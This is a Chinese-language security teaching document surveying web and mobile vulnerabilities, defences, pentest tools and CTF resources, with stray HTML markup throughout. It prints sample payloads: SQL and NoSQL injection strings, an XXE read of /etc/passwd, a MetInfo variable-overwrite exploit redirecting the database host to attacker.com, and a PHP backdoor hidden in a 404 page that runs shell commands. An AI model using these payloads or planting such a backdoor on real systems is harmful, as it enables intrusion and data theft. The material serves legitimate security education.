Web及移动安全实战教学文档<\/h1>

一、安全动态与趋势分析<\/h2>

1.1 近期重大漏洞分析<\/h3>

Struts2-045漏洞<\/strong>：远程代码执行漏洞，攻击者可通过构造恶意Content-Type头实现系统命令执行<\/li>
Facebook密码重置漏洞<\/strong>：价值$15000的漏洞，涉及逻辑缺陷导致未授权密码重置<\/li>
Jive-n XXE漏洞(CVE-2018-5758)<\/strong>：XML外部实体注入漏洞，可导致敏感文件读取<\/li>

Windows远程协助漏洞(CVE-2018-0878)<\/strong>：严重级别漏洞，影响远程协助功能<\/li> <\/ul>
1.2 当前安全趋势<\/h3>
热门趋势：<\/h4>

硬件钱包安全研究（如Ledger硬件钱包漏洞）<\/li>
办公文档攻击（Microsoft Excel CSV代码执行）<\/li>
指挥与控制基础设施(C2)构建技术<\/li>
红队战术从MSSQL到RCE的渗透路径<\/li>
APT组织攻击手法演进（如APT32海莲花组织）<\/li> <\/ol>
渐冷趋势：<\/h4>

传统签名式杀毒技术<\/li>
单一维度防御策略<\/li>
非智能化的日志分析<\/li>
静态漏洞扫描方法<\/li> <\/ol>
二、Web安全核心技术<\/h2>
2.1 注入类漏洞<\/h3>
SQL注入：<\/h4>

原理：未过滤的用户输入拼接至SQL语句<\/li>
防御：参数化查询、输入过滤、最小权限原则<\/li>
实战：
-- 经典联合查询注入 <\/span><\/span><\/span><\/span>' UNION SELECT username, password FROM users-- <\/span><\/span><\/span> <\/span><\/span><\/span>-- 布尔盲注 <\/span><\/span><\/span>'<\/span> AND<\/span> 1<\/span>=<\/span>CONVERT<\/span>(int, (SELECT<\/span> table_name<\/span> FROM<\/span> information_schema.tables))-- <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> NoSQL注入：<\/h4> MongoDB示例： \/\/ 原始查询 <\/span><\/span><\/span><\/span>db<\/span>.users<\/span>.find<\/span>({user<\/span>:<\/span> req<\/span>.body<\/span>.user<\/span>, pass<\/span>:<\/span> req<\/span>.body<\/span>.pass<\/span>}) <\/span><\/span> <\/span><\/span>\/\/ 攻击向量 <\/span><\/span><\/span><\/span>{"user"<\/span>:<\/span> {"$ne"<\/span>:<\/span> null<\/span>}, "pass"<\/span>:<\/span> {"$ne"<\/span>:<\/span> null<\/span>}} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2.2 跨站脚本(XSS)<\/h3> 存储型XSS：通过Facebook存储型XSS案例<\/li> 防御方法：内容安全策略(CSP)<\/li> 输出编码<\/li> HttpOnly Cookie标志<\/li> 输入验证<\/li> <\/ul> <\/li> <\/ul> 2.3 跨站请求伪造(CSRF)<\/h3> 攻击原理：利用已认证状态执行非预期操作<\/li> 防御措施：同源策略检查<\/li> CSRF Token<\/li> 双重提交Cookie<\/li> <\/ul> <\/li> <\/ul> 2.4 文件包含与XXE<\/h3> XXE攻击示例： <\/span> <\/span><\/span><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd"><\/span>]> <\/span><\/span><user><\/span>&xxe;<\/user><\/span> <\/span><\/span><\/code><\/pre><\/li> 防御：禁用外部实体解析、使用白名单验证<\/li> <\/ul> 三、移动安全专项<\/h2> 3.1 移动应用常见漏洞<\/h3> 不安全的数据存储<\/li> 不充分的加密<\/li> 不安全的通信<\/li> 认证绕过<\/li> 代码篡改风险<\/li> <\/ol> 3.2 移动端渗透技术<\/h3> 中间人攻击防护<\/li> 证书绑定实现<\/li> 反逆向工程措施<\/li> 运行时保护机制<\/li> <\/ul> 四、渗透测试实战技巧<\/h2> 4.1 信息收集阶段<\/h3> 使用Th3inspector进行综合信息收集<\/li> WPHunter扫描WordPress漏洞<\/li> SNMP密码破解技术<\/li> <\/ul> 4.2 漏洞利用<\/h3> MetInfo PHP变量覆盖漏洞<\/strong>： \/\/ 漏洞代码示例 <\/span><\/span><\/span><\/span>foreach<\/span>($_GET as<\/span> $key =><\/span> $value) { <\/span><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> \[key = $value; } \/\/ 利用方式 ?config[db_host]=attacker.com&config[db_user]=hacker ``` - **404页面隐藏后门**： ```php \/\/ 伪装在404页面中的后门 if(isset($_GET['cmd']) && $_SERVER['REQUEST_URI'] == '\/404.html') { system($_GET['cmd']); } ``` ### 4.3 权限提升 - **Windows系统**： - 通过SAM数据库获取本地用户Hash - 使用Windows提权辅助工具 - **Linux系统**： - LiME内存提取分析技术 - 内核漏洞利用 ### 4.4 后渗透阶段 - SSH隧道技术： ```bash # 本地端口转发 ssh -L 8080:internal:80 user@gateway # 动态端口转发 ssh -D 1080 user@remote_host ``` - C2基础设施搭建 - 持久化维持访问技术 ## 五、防御体系建设 ### 5.1 Web应用防护 - 全局SQL注入防御代码实现 - HTTPS完整部署指南 - WAF规则定制策略 ### 5.2 安全开发实践 - 安全编码规范 - 代码审计技巧（如tinyshop审计案例） - 自动化安全测试流程 ### 5.3 红蓝对抗 - 红队战术： - 从MSSQL到RCE的完整路径 - 网络边界突破技巧 - 蓝队防御： - Loki IOC扫描器使用 - 事件响应流程 ## 六、工具集锦 ### 6.1 渗透测试工具 1. **Nmap高级脚本**： ```bash nmap -sV --script=vulners <target> ``` 2. **Burp与sqlmap联动**： ```bash sqlmap -r request.txt --proxy=http:\/\/127.0.0.1:8080 ``` 3. **Toxy HTTP代理**：模拟异常网络条件测试 4. **InfernalWireless**：自动化无线攻击工具 ### 6.2 防御工具 1. **SmarTTY**：安全SSH客户端 2. **ARDT**：DDoS防护测试工具 3. **Powershell-RAT检测工具** ## 七、CTF实战解析 ### 7.1 Web题型 - BugKu CTF题解（SQL注入、代码审计、反序列化） - USV-2017全题解思路 ### 7.2 综合渗透 - FristiLeaks完整渗透过程 - SecOS系统渗透案例 ## 八、进阶研究 ### 8.1 硬件安全 - 路由器漏洞EXP开发 - 物联网设备固件分析 - 硬件钱包安全机制 ### 8.2 新兴领域 - AI安全攻防 - 区块链安全分析 - 云原生安全架构 ## 附录：资源推荐 1. 红日安全系列教程 2. 天融信阿尔法实验室日报 3. 腾讯玄武实验室安全动态 4. FreeBuf安全工具合集 --- 本教学文档基于红日安全32期及FreeBuf安全资源整理，涵盖Web及移动安全的核心知识点和实战技巧。建议读者按照自身水平选择相应章节进行实践，所有技术仅用于合法授权测试。\]<\/span><\/p>